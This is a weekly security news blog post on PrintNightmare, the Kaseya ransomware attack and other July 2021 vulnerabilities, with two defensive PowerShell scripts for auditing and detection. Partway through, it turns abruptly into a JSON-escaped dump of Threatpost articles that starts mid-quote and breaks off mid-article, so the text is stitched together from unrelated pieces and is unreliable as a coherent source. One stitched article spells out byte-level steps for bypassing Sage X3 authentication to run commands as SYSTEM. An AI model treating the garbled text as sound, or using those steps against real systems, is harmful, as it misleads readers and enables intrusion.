Hello guys! The third episode of Last Week’s Security news, July 5 - July 11. There was a lot of news last week, and most of it was again about PrintNightmare and Kaseya.
The updates for PrintNightmare (CVE-2021-34527) [were finally released](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) mid-week. It is now possible not only to disable the Print Spooler service, but also to patch the hosts, which matters most for desktops that actually need to print. But the problem is that these [patches can be bypassed](<https://twitter.com/wdormann/status/1412813044279910416>). Will Dormann: "If you have a system where PointAndPrint NoWarningNoElevationOnInstall = 1, then Microsoft's patch for #PrintNightmare CVE-2021-34527 does nothing to prevent either LPE or RCE". Microsoft then updated its security update guide to say, in effect, "if you set this reg key to = 1 then the system is vulnerable by design": both NoWarningNoElevationOnInstall and UpdatePromptSettings under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint must be 0 or not defined for the update to be effective. These values are written by the "Point and Print Restrictions" Group Policy, so a policy that was relaxed years ago to let users install printer drivers silently quietly undoes the patch. Installing the update is therefore not enough: solving this problem requires hardening the Point and Print settings and monitoring the registry (and the policy that feeds it) so they do not drift back.
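As an added example (not code from the original post or from Microsoft), the following PowerShell script performs the check described above on the local host: it reads the two Point and Print values that neutralise the CVE-2021-34527 patch, reports the Spooler service state, optionally resets the values to 0, and optionally puts an audit SACL on the key so later changes show up in the Security log. The registry path and value names come from Microsoft's guidance; the `-Remediate` and `-EnableAudit` switches and the output layout are this example's own choices. Run it in an elevated session.

```powershell
# Added example (not from the original post or from Microsoft): audit the
# Point and Print policy values that make a patched host "vulnerable by design"
# for CVE-2021-34527, report the Print Spooler state, and optionally fix/audit.
# Registry path and value names: Microsoft's CVE-2021-34527 guidance.
# The switches, the output shape and the SACL choice are this example's own.
[CmdletBinding()]
param(
    [switch]$Remediate,     # assumed option: reset offending values to 0
    [switch]$EnableAudit    # assumed option: SACL the key so writes log Event ID 4657
)

$PolicyPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
# Microsoft: both values must be 0 or not defined after the July 2021 update.
$PointAndPrintValues = 'NoWarningNoElevationOnInstall', 'UpdatePromptSettings'

function Get-PointAndPrintFindings {
    # Returns one object per value that is present and non-zero.
    $findings = @()
    if (-not (Test-Path $PolicyPath)) {
        return $findings   # key absent means "not defined", which is the safe state
    }
    $props = Get-ItemProperty -Path $PolicyPath
    foreach ($name in $PointAndPrintValues) {
        $value = $props.$name
        if ($null -ne $value -and $value -ne 0) {
            $findings += [pscustomobject]@{ Name = $name; Value = $value }
        }
    }
    return $findings
}

function Get-SpoolerState {
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if ($null -eq $svc) { return 'not installed' }
    return ('{0} (StartType={1})' -f $svc.Status, $svc.StartType)
}

$findings = Get-PointAndPrintFindings
[pscustomobject]@{
    Computer      = $env:COMPUTERNAME
    Spooler       = Get-SpoolerState
    PatchBypassed = ($findings.Count -gt 0)
    Findings      = ($findings | ForEach-Object { "$($_.Name)=$($_.Value)" }) -join '; '
} | Format-List

if ($Remediate -and $findings.Count -gt 0) {
    foreach ($f in $findings) {
        # 0 restores the warning and elevation prompts the patch relies on.
        Set-ItemProperty -Path $PolicyPath -Name $f.Name -Value 0 -Type DWord
        Write-Host "Set $($f.Name) to 0"
    }
}

if ($EnableAudit -and (Test-Path $PolicyPath)) {
    # Audit successful writes to the key. Event ID 4657 only appears if
    # "Audit Registry" (Object Access) success auditing is enabled on the host.
    $acl  = Get-Acl -Path $PolicyPath -Audit
    $rule = [System.Security.AccessControl.RegistryAuditRule]::new(
        'Everyone', 'SetValue,CreateSubKey,Delete', 'ContainerInherit', 'None', 'Success')
    $acl.AddAuditRule($rule)
    Set-Acl -Path $PolicyPath -AclObject $acl
    Write-Host "Audit rule added to $PolicyPath"
}
```

Because Group Policy rewrites these values on every refresh, a one-off remediation on a domain-joined host is undone at the next `gpupdate`; fix the Point and Print Restrictions policy itself and re-run the check afterwards to confirm the host stays clean.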
PrintNightmare exploitation just got easier. Rapid7 [researchers have added a new module](<https://www.rapid7.com/blog/post/2021/07/09/metasploit-wrap-up-120/>) for PrintNightmare to Metasploit. The module triggers a remote DLL load by abusing the vulnerability in the Print Spooler service: an authenticated remote attacker (any valid domain account is enough) sends a crafted DCERPC request over the MS-RPRN vector that makes the spooler load an attacker-supplied DLL, hosted on a share the attacker controls, resulting in remote code execution as NT AUTHORITY\SYSTEM. With a point-and-click module available, expect this to show up in every internal engagement and in commodity intrusions, and treat any unpatched host with the Spooler running as exposed.
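As an added detection example (not from the original post and not part of the Metasploit module), this PowerShell script looks for the traces a PrintNightmare-style driver load leaves on a host: PrintService event 316 (a printer driver was added or updated, with the list of files it loaded), PrintService/Admin event 808 (the spooler failed to load a plug-in module, which usually names the exploit DLL), and DLLs recently written under the spooler's driver directory. The event IDs and log names are standard Windows ones; the lookback window and the "suspicious path" heuristic are this example's own assumptions.

```powershell
# Added example (not from the original post or the Metasploit module): hunt
# for artifacts of a PrintNightmare-style driver load on the local host.
# Event IDs/log names are standard Windows PrintService events; the lookback
# window and the heuristics below are this example's own choices.
[CmdletBinding()]
param(
    [datetime]$Since = (Get-Date).AddDays(-7)   # assumed lookback window
)

# Microsoft-Windows-PrintService/Operational is disabled by default; 316 events
# exist only once it has been enabled, e.g.
#   wevtutil sl Microsoft-Windows-PrintService/Operational /e:true
$DriverRoot = Join-Path $env:SystemRoot 'System32\spool\drivers'

function Get-PrintDriverEvents {
    param([datetime]$StartTime)
    $queries = @(
        # 316: "Printer driver ... was added or updated. Files:- ..."
        @{ LogName = 'Microsoft-Windows-PrintService/Operational'; Id = 316; StartTime = $StartTime },
        # 808: "The print spooler failed to load a plug-in module <path>"
        @{ LogName = 'Microsoft-Windows-PrintService/Admin'; Id = 808; StartTime = $StartTime }
    )
    foreach ($q in $queries) {
        Get-WinEvent -FilterHashtable $q -ErrorAction SilentlyContinue |
            ForEach-Object {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Id      = $_.Id
                    Message = ($_.Message -replace '\s+', ' ')
                }
            }
    }
}

function Get-RecentDriverFiles {
    param([datetime]$StartTime)
    if (-not (Test-Path $DriverRoot)) { return @() }
    # A dropped driver DLL lands under <arch>\3\ and is moved to <arch>\3\old\<n>\
    # when the spooler "upgrades" it, so DLLs in an 'old' directory are worth a look,
    # as is anything without a valid Authenticode signature.
    Get-ChildItem -Path $DriverRoot -Recurse -File -Include *.dll -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -ge $StartTime } |
        Select-Object FullName, LastWriteTime,
            @{ n = 'Signature'; e = { (Get-AuthenticodeSignature $_.FullName).Status } },
            @{ n = 'InOldDir';  e = { $_.FullName -match '\\3\\old\\' } }
}

Write-Host "PrintService events since $Since"
Get-PrintDriverEvents -StartTime $Since | Format-Table -AutoSize -Wrap

Write-Host "DLLs written under $DriverRoot since $Since"
Get-RecentDriverFiles -StartTime $Since | Format-Table -AutoSize
```

On a print server, legitimate driver updates also produce 316 events and freshly written signed DLLs, so the signals to escalate on are an unsigned DLL, a DLL sitting in an `old\` directory, or an 808 event naming a path that no administrator installed.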
There was a lot of news regarding Kaseya. I would not say that in a week we learned something fundamentally new, but almost all of the guesses were confirmed. [Seven CVEs associated with the attack became known](<https://www.rapid7.com/blog/post/2021/07/08/managed-service-providers-used-in-coordinated-mass-ransomware-attack-impacting-hundreds-of-companies/>) (CVE-2021-30116, CVE-2021-30117, CVE-2021-30118, CVE-2021-30119, CVE-2021-30120, CVE-2021-30121, CVE-2021-30201). Huntress security researcher [Caleb Stewart successfully reproduced the Kaseya VSA exploits](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>) used to deploy REvil/Sodinokibi ransomware and released a PoC demonstration video showing an authentication bypass, an arbitrary file upload and a command injection chained together. [Brian Krebs also wrote about a directory traversal](<https://krebsonsecurity.com/2021/07/kaseya-left-customer-portal-vulnerable-to-2015-flaw-in-its-own-software/>) vulnerability (CVE-2015-2862) in the customer portal portal.kaseya.net that had remained unfixed since 2015; the portal "was deprecated but left up". The Compromise Detection Tool has been made public. The ransomware operators have demanded $70m for a master decryption key. Some threat actors targeted victims via email with fake patches that push Cobalt Strike payloads, so anyone waiting for the real fix should take it only from Kaseya's own channels. [Kaseya delayed the SaaS restore to Sunday July 11](<https://www.theregister.com/2021/07/09/kaseya_saas_restoration_july_11/>) and promises an “exponentially more secure” product. And if you think that only Kaseya has such problems, you are wrong.
Continuing the theme that the security problems of your service providers are your problems: [Morgan Stanley has confirmed a data breach](<https://www.darkreading.com/attacks-breaches/morgan-stanley-discloses-data-breach-/d/d-id/1341503>) in which attackers accessed personal information belonging to customers by exploiting a vulnerability in an Accellion FTA server. The attackers obtained participant data including name, last known address, birth date, Social Security number and corporate company name. The server belonged to Guidehouse, a vendor that provides account maintenance services to Morgan Stanley's StockPlan Connect business. Guidehouse patched the vulnerability within five days of the fix becoming available, but the attacker got to the data within that window, officials said. The vendor discovered the attack in March 2021 and learned in May that it affected Morgan Stanley. As you can see, five days to patch a critical vulnerability on an internet-facing appliance is too long when the bug is already being exploited; for that class of system the realistic options are patching within hours or taking it offline until the patch lands.
The US Cybersecurity and Infrastructure Security Agency (CISA) [has released an analysis](<https://www.cisa.gov/publication/rva>) of the findings from the Risk and Vulnerability Assessments (RVAs) it conducted during fiscal year 2020 across industries. The analysis walks through a sample attack path an intruder could take to compromise an organization, built from the weaknesses CISA actually saw in RVAs over the past year. Quite interesting stuff, especially [the infographic](<https://www.cisa.gov/sites/default/files/publications/FY20_RVAs_Mapped_to_the_MITRE_ATTCK_Framework_508_corrected.pdf>) mapping the findings to MITRE ATT&CK. The Initial Access statistics stood out: phishing links were the most common technique, used to gain initial access in 49% of RVAs, followed by exploitation of public-facing applications (11.8%) and phishing attachments (9.8%). So if you are focusing on anti-phishing and perimeter control, you are building your first line of defense in the right place.
[North Korean APT Lazarus Group is impersonating](<https://threatpost.com/lazarus-engineers-malicious-docs/167647/>) Airbus, General Motors and Rheinmetall to lure job-seeking engineers into downloading malware, according to a report published by AT&T Alien Labs. The final payload of the Rheinmetall document uses Mavinject.exe, a legitimate Windows component that has been abused by malware before, to inject arbitrary code into any running process. The Airbus document macro executes the payload with an updated technique: the attackers no longer use Mavinject but launch the payload directly through explorer.exe, which significantly changes the resulting process tree and therefore sidesteps detections keyed on Mavinject. So when an unexpectedly interesting job offer arrives in your inbox, be careful.
[A set of high-severity privilege-escalation vulnerabilities](<https://threatpost.com/cisco-bpa-wsa-bugs-cyberattacks/167654/>) affects Cisco's Business Process Automation (BPA) application and Web Security Appliance (WSA) and could allow authenticated, remote attackers to access sensitive data or take over a targeted system. The fact that authentication is required makes these less interesting, although any valid set of credentials on the appliance is enough as a starting point, and a WSA sits in the path of all outbound web traffic. These are also apparently not the most popular Cisco products. But if you are using BPA or WSA, be aware and patch.
[Four security vulnerabilities](<https://thehackernews.com/2021/07/critical-flaws-reported-in-sage-x3.html>) (CVE-2020-7388, CVE-2020-7389, CVE-2020-7387, CVE-2020-7390) have been disclosed in the Sage X3 enterprise resource planning (ERP) product, two of which can be chained as part of an attack sequence to execute commands on the underlying server and take control of vulnerable systems. Sage X3 installations should not be exposed directly to the internet; in particular the administration service should be reachable only from the internal network, with access over a VPN where it is required.
Multiple security vulnerabilities have been [disclosed in the Philips Clinical Collaboration](<https://thehackernews.com/2021/07/critical-flaws-reported-in-philips-vue.html>) Platform Portal (Vue PACS). Successful exploitation could allow an unauthorized person or process to eavesdrop, view or modify data, gain system access, execute code, install unauthorized software, or tamper with system data, negatively impacting the confidentiality, integrity or availability of the system. Everything related to medicine goes through the strictest certification regimes. As you can see, certification does not substitute for security engineering.

\u201cA company can\u2019t decline doing the essentials, because that is equivalent to being negligent on the risks related to cybersecurity, and there is plenty of material about what is essential.\u201d\n\nQuick searches point to areas in Kaseya\u2019s security that could be improved, Schrader added, such as outdated certificates on networking devices and on Kaseya\u2019s own instances of VSA. \u201cIt comes down to its security operations, its processes and whether they are up to par with the current threat landscape,\u201d Schrader said.\n\nTo support his statement, Schrader pointed to Cisco IOS device(s) [with an outdated cert](<http://\\(https://whois.arin.net/rest/net/NET-208-75-20-88-1/pft?s=208.75.20.88\\)>) used by Kaseya itself, noting that there are a couple of IPs showing the same issue. He found multiple additional certificate issues, including [this one ](<http://\\(https://whois.arin.net/rest/net/NET-208-75-20-88-1/pft?s=208.75.20.88\\)>)and [this one](<https://whois.arin.net/rest/net/NET-23-31-43-48-1/pft?s=23.31.43.59>).\n\n## A Baker\u2019s Half-Dozen of Bugs\n\nMost of the seven vulnerabilities reported to Kaseya by DVID were patched on Kaseya\u2019s VSA SaaS service, but up until Saturday, three outstanding security holes on the VSA on-premise version still needed to be battened down. 
The attackers had snuck into that gap before Kaseya had a chance to bolster its on-premise VSA servers.\n\nThe three on-premise VSA bugs that Kaseya has now stomped:\n\n * [CVE-2021-30116](<https://csirt.divd.nl/cves/CVE-2021-30116>) \u2013 A credentials leak and business logic flaw, included in [version 9.5.7](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041>) rolled out on Saturday.\n * [CVE-2021-30119](<https://csirt.divd.nl/cves/CVE-2021-30119>) \u2013 A cross-site scripting (CSS) vulnerability, included in version 9.5.7.\n * [CVE-2021-30120](<https://csirt.divd.nl/cves/CVE-2021-30120>) \u2013 A bypass of two-factor authentication (2FA), included in version 9.5.7.\n\nFollowing the July 2 onslaught, Kaseya urged on-premise VSA customers to shut down their servers until the patch was ready. To punch up security still more, Kaseya is also [recommending](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403760102417>) limiting network access to the VSA Application/GUI to local IP addresses only, \u201cby blocking all inbound traffic except for port 5721 (the agent port). Administrators will only be able to access the application from the local network or by using a VPN to connect to the local network.\u201d\n\n## Older Bugs\n\nBesides the outstanding trio of bugs Kaseya addressed on Sunday, these are the other four vulnerabilities that DIVD disclosed and which Kaseya already fixed before the July 2 attacks:\n\n * [CVE-2021-30117](<https://csirt.divd.nl/cves/CVE-2021-30117>) \u2013 An SQL injection vulnerability, resolved in a May 8 patch.\n * [CVE-2021-30118](<https://csirt.divd.nl/cves/CVE-2021-30118>) \u2013 A remote code execution (RCE) vulnerability, resolved in an April 10 patch. 
(v9.5.6)\n * [CVE-2021-30121](<https://csirt.divd.nl/cves/CVE-2021-30121>) \u2013 A [local file inclusion (LFI) vulnerability](<https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion>), resolved in the May 8 patch.\n * [CVE-2021-30201](<https://csirt.divd.nl/cves/CVE-2021-30201>) \u2013 An [XML external entity (XXE) vulnerability](<https://owasp.org/www-community/vulnerabilities/XML_External_Entity_\\(XXE\\)_Processing>), resolved in the May 8 patch.\n\n071221 11:58 UPDATE: Added commentary from Dana Liedholm.\n\n071221 12:13 UPDATE: Added commentary from Jake Williams.\n\n071221 12:32 UPDATE: Added commentary from Dirk Schrader.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-12T15:53:42", "type": "threatpost", "title": "Kaseya Patches Zero-Days Used in REvil Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30119", "CVE-2021-30120", "CVE-2021-30121", "CVE-2021-30201"], "modified": "2021-07-12T15:53:42", "id": "THREATPOST:E35CE2557CF4CF511B2359A81096AE4F", "href": "https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-07T18:38:04", "description": "Four vulnerabilities afflict the popular Sage X3 enterprise resource planning (ERP) platform, researchers found \u2013 including one critical bug that rates 10 out of 10 on the CVSS vulnerability-severity scale. 
Two of the bugs could be chained together to allow complete system takeovers, with potential supply-chain ramifications, they said.\n\nSage X3 is targeted at mid-sized companies \u2013 particularly manufacturers and distributors \u2013 that are looking for all-in-one ERP functionality. The system manages sales, finance, inventory, purchasing, customer-relationship management and manufacturing in one integrated ERP software solution.\n\nRapid7 researchers Jonathan Peterson, Aaron Herndon, Cale Black, Ryan Villarreal and William Vu, who discovered the issues (CVE-2020-7387 through -7390), said that the most severe of the flaws exist in the remote administrator function of the platform. As such, they said that there could be supply-chain ramifications to a successful attack ([a la Kaseya](<https://threatpost.com/kaseya-patches-zero-day-exploits/167548/>)) if the platform is being used by managed service providers to deliver functionality to other businesses.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWhen combining CVE-2020-7387 and CVE-2020-7388, an attacker can first learn the installation path of the affected software, then use that information to pass commands to the host system to be run in the SYSTEM context,\u201d the researchers said in a [Wednesday posting](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>). \u201cThis can allow an attacker to run arbitrary operating system commands to create Administrator level users, install malicious software and otherwise take complete control of the system for any purpose.\u201d\n\n## **Critical Authentication-Bypass Security Vulnerability**\n\nThe critical bug (CVE-2020-7388) allows unauthenticated remote command execution (RCE) with elevated privileges in the AdxDSrv.exe component, according to Rapid7. 
AdxAdmin is a function that\u2019s responsible for the remote administration of Sage X3 through the main console, researchers said \u2013 and an exploit could allow an adversary to execute commands on the server as the high-privileged \u201cNT AUTHORITY/SYSTEM\u201d user.\n\nThe administrative service is exposed on port TCP/1818 by default, under the process \u201cAdxDSrv.exe.\u201d The issue lies in the custom protocol that Sage X3 uses for interaction between the Sage X3 Console and AdxDSrv.exe, according to Rapid7.\n\nThe Sage X3 Console crafts a request to authenticate using a byte sequence that includes a password that\u2019s been encrypted using a custom mechanism. In response, the AdxDSrv.exe sends four bytes, indicating that authentication was successful.\n\n\u201cThese bytes are always prefixed with \\x00\\x00 and then two apparently random bytes, like so: \u2018\\x00\\x00\\x08\\x14,'\u201d researchers said.\n\nAfter receiving a response that the authentication was successful, it\u2019s then possible to execute remote commands, according to the advisory.\n\n\u201cFirst, the temporary directory is specified by the client with the name of the cmd file to be written to the server,\u201d researchers explained. \u201cThe batch file, with the provided cmd file name, is written to disk with the \u2018whoami\u2019 command in it. After the AdxDSrv.exe service writes the temporary batch file to the named folder, it will execute it under the security context of the provided user credentials, via a Windows API call to CreateProcessAsUserAs.\u201d\n\nTo exploit the issue and bypass the authentication process, a malicious actor could craft a special request to the exposed service. 
The cyberattacker would need to sidestep two components involved in sending a command to execute, researchers said.\n\nFirst, the attackers must know the installation directory of the AdxAdmin service, so that they can specify the full path location to which to write the cmd file to be executed.\n\n\u201cObtaining the installation\u2019s directory can be done either with prior knowledge, educated guesswork, or via an unauthenticated, remote information disclosure vulnerability (CVE-2020-7387),\u201d researchers said. \u201cInstallation path names tend to be fairly predictable when it comes to most enterprise software\u2014nearly all users install to a default directory on one of a handful of drive letters.\u201d\n\nSecondly, the attackers must confound the authorization sequence that includes the encrypted password. This can be done using a series of packets that spoof the AdxDSrv.exe authentication and command protocol, but with one critical modification.\n\n\u201cAn attacker can simply swap one byte and cause the service to ignore provided user credentials, and instead execute under the current AdxDSrv.exe process security context, which runs as NT AUTHORITY\\SYSTEM,\u201d researchers explained \u201cA bit of fuzzing revealed that using \u20180x06\u2019 instead of \u20180x6a\u2019 during the start of the authorization sequence allows [the client] to opt out of authentication entirely. 
In this mode, the requested command is executed as SYSTEM instead of impersonating a provided user account.\u201d\n\nThe issue affects V9, V11 and V12 versions of the platform.\n\n## **Medium-Severity Bugs in Sage X3**\n\nThe other three issues are rated medium in severity:\n\n * CVE-2020-7387: Exposure of Sensitive Information to an Unauthorized Actor in AdxAdmin (CVSS rating 5.3, affects V9, V11 and V12 versions)\n * CVE-2020-7389: Missing Authentication for Critical Function in Developer Environment in Syracuse (CVSS rating of 5.5, affects V9, V11 and V12 versions)\n * CVE-2020-7390: Persistent Cross-Site Scripting (XSS) in Syracuse (CVSS rating of 4.6, affects V12 only). This issue was previously reported to the vendor by Vivek Srivastav from Cobalt Labs in January, according to Rapid7.\n\nAs mentioned, the bug tracked as CVE-2020-7387 allows attackers to uncover the pathname for the needed installation directory, for use in exploiting the critical RCE flaw.\n\n\u201cWhile fuzzing the authentication and command protocol used by AdxAdmin.exe as described in CVE-2020-7388, it was discovered that sending the first byte as \u20180x09\u2019 rather than \u20180x6a,\u2019 with three trailing null bytes, returned the installation directory without requiring any authentication,\u201d researchers explained.\n\nMeanwhile, CVE-2020-7389 is a system CHAINE variable script command-injection bug \u2013 but Sage said that it wouldn\u2019t be fixing the issue since the functionality where the bug lives should only be available in development environments, not in production environments.\n\n\u201cSome web application scripts that allowed the use of the \u2018System\u2019 function could be paired with the \u2018CHAINE\u2019 variable in order to execute arbitrary commands, including those sourced from a remote SMB share,\u201d according to the analysis. 
\u201cThe page can be reached via the menu prompts Development -> Script dictionary -> Scripts.\u201d\n\nAnd finally, the CVE-2020-7390 vulnerability is a [stored XSS bug](<https://threatpost.com/unpatched-linux-marketplace-bugs-rce/167155/>). Stored XSS, also known as persistent XSS, occurs when a malicious script is injected directly into a vulnerable web application. Unlike reflected XSS, a stored attack only requires that a victim visit a compromised web page. In this case, the issue exists on the \u201cEdit\u201d page for user profiles, with the fields for first name, last name and email fields vulnerable to a stored XSS sequence, researchers said.\n\nA successful exploit could allow a regular user of Sage X3 to execute privileged functions as a currently logged-in administrator or to capture administrator session cookies for later impersonation as a currently logged-in administrator, according to Rapid7.\n\n\u201c[The bug] can only be triggered by an authenticated user, and requires user interaction [convincing the authenticated person to visit the correct webpage] in order to complete the attack,\u201d researchers explained.\n\n## **Patching Information for Sage ERP Security Vulnerabilities**\n\nThe three eligible vulnerabilities were fixed in recent releases for Sage X3 Version 9 (those components that ship with Syracuse 9.22.7.2), Sage X3 HR & Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Sage X3 Version 11 (Syracuse v11.25.2.6), and Sage X3 Version 12 (Syracuse v12.10.2.8). Note: There was no commercially available Version 10 of Sage X3.\n\nIf updates cannot be applied immediately, customers have other options for remediation, according to Rapid7:\n\n * _For CVE-2020-7388 and CVE-2020-7387, do not expose the AdxDSrv.exe TCP port on any host running Sage X3 to the internet or other untrusted networks. 
As a further preventative measure, the AdxAdmin service should be stopped entirely while in production._\n * _For CVE-2020-7389 users should not expose this webapp interface to the internet or other untrusted networks. Furthermore, users of Sage X3 should ensure that development functionality is not available in production environments. For more information on ensuring this, please refer to the vendor\u2019s best practices documentation._\n * _In the event that network segmentation is inconvenient due to business-critical functions, only users trusted with system administration of the machines that host Sage X3 should be granted login access to the web application._\n\n\u201cGenerally speaking, Sage X3 installations should not be exposed directly to the internet, and should instead be made available via a secure VPN connection where required,\u201d according to the analysis. \u201cFollowing this operational advice effectively mitigates all four vulnerabilities, though customers are still urged to update according to their usual patch cycle schedules.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-07T18:34:24", "type": "threatpost", "title": "Critical Sage X3 RCE Bug Allows Full System Takeovers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-7387", "CVE-2020-7388", "CVE-2020-7389", "CVE-2020-7390"], "modified": "2021-07-07T18:34:24", "id": "THREATPOST:B3B543942E69CA8867497B6F2638F91F", "href": "https://threatpost.com/critical-sage-x3-rce-bug-allows-full-system-takeovers/167612/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-06T21:23:56", "description": "The U.S. 
government has stepped in to offer a mitigation for a critical remote code execution (RCE) vulnerability in the Windows Print Spooler service that may not have been fully patched by Microsoft\u2019s initial effort to fix it.\n\nTo mitigate the bug, [dubbed PrintNightmare](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>), the CERT Coordination Center (CERT/CC) has released a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) for CVE-2021-1675 urging system administrations to disable the Windows Print Spooler service in Domain Controllers and systems that do not print, the Cybersecurity Infratructure and Security Administration (CISA) said [in a release](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) Thursday. CERT/CC is part of the Software Engineering Institute, a federally funded research center operated by Carnegie Mellon University.\n\n\u201cWhile Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>) configured with the NoWarningNoElevationOnInstall option configured,\u201d CERT/CC researchers wrote in the note.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe mitigation is in response to a scenario that unfolded earlier this week when a proof-of-concept (POC) for PrintNightmare was dropped on GitHub on Tuesday. While it was taken back down within a few hours, the code was copied and remains in circulation on the platform. 
An attacker can use the POC to exploit the vulnerability to take control of an affected system.\n\nIn the meantime, Microsoft Thursday put out a new advisory of its own on PrintNightmare that assigns a new CVE and seems to suggest a new attack vector while attempting to clarify confusion that has arisen over it.\n\nWhile the company originally addressed CVE-2021-1675 in [June\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) as a minor elevation-of-privilege vulnerability, the listing was updated last week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, soon after it became clear to many experts that the patch appears to fail against the RCE aspect of the bug\u2014hence CISA\u2019s offer of another mitigation and Microsoft\u2019s update.\n\n## **Assignment of New CVE?**\n\nRegarding the latter, the company dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) Thursday for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appears to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527.\n\nThe description of the bug sounds like PrintNightmare; indeed, Microsoft acknowledges that it is \u201can evolving situation.\n\n\u201cA remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\u201d according to the notice. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\nIn a \u201cFAQ\u201d section in the security update, Microsoft attempts to explain CVE-2021-34527\u2019s connection to CVE-2021-1675.\n\n\u201cIs this the vulnerability that has been referred to publicly as PrintNightmare? 
Yes, Microsoft has assigned CVE-2021-34527 to this vulnerability,\u201d the company wrote.\n\nHowever, the answer to the question \u201cIs this vulnerability related to CVE-2021-1675?\u201d suggests that CVE-2021-34527 is a different issue.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\nMicrosoft goes on to explain that CVE-2021-34527 existed before the June Patch Tuesday updates and that it affects domain controllers in \u201call versions of Windows.\u201d\n\n**\u201c**We are still investigating whether all versions are exploitable,\u201d the company wrote. \u201cWe will update this CVE when that information is evident.\u201d\n\nMicrosoft did not assign a score to CVE-2021-34527, citing its ongoing investigation.\n\n## **Two Vulnerabilities?**\n\nIn retrospect, one security researcher noted to Threatpost when news of PrintNightmare surfaced Tuesday that it was \u201ccurious\u201d that the CVE for the original vulnerability was \u201c-1675,\u201d observing that \u201cmost of the CVEs Microsoft patched in June are -31000 and higher.\u201d\n\n\u201cThis could be an indicator that they have known about this bug for some time, and fully addressing it is not trivial,\u201d Dustin Childs of Trend Micro\u2019s Zero Day Initiative told Threatpost at the time.\n\nNow it appears that perhaps Microsoft was patching only part of a more complex vulnerability. 
The likely scenario appears to be that there are two bugs in Windows Print Spooler that could offer attackers some kind of exploit chain or be used separately to take over systems.\n\nWhile one flaw may indeed have been addressed in June\u2019s Patch Tuesday update, the other could be mitigated by CERT/CC\u2019s workaround\u2014or could remain to be patched by a future Microsoft update that comes after the company completes its investigation.\n\nThe company\u2019s release Thursday of a new CVE related to PrintNightmare seems to be an initial attempt to clarify the situation, though given its developing nature, it remains a bit hazy for now.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-02T12:21:02", "type": "threatpost", "title": "CISA Offers New Mitigation for PrintNightmare Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-30116", "CVE-2021-34527"], "modified": "2021-07-02T12:21:02", "id": "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "href": "https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-06T21:35:58", "description": "UPDATE\n\nCybercriminals behind a string of high-profile ransomware attacks, including [one extorting $11 million from JBS Foods](<https://threatpost.com/jbs-paid-11m/166767/>) last month, have ported their malware code to the Linux operating system. 
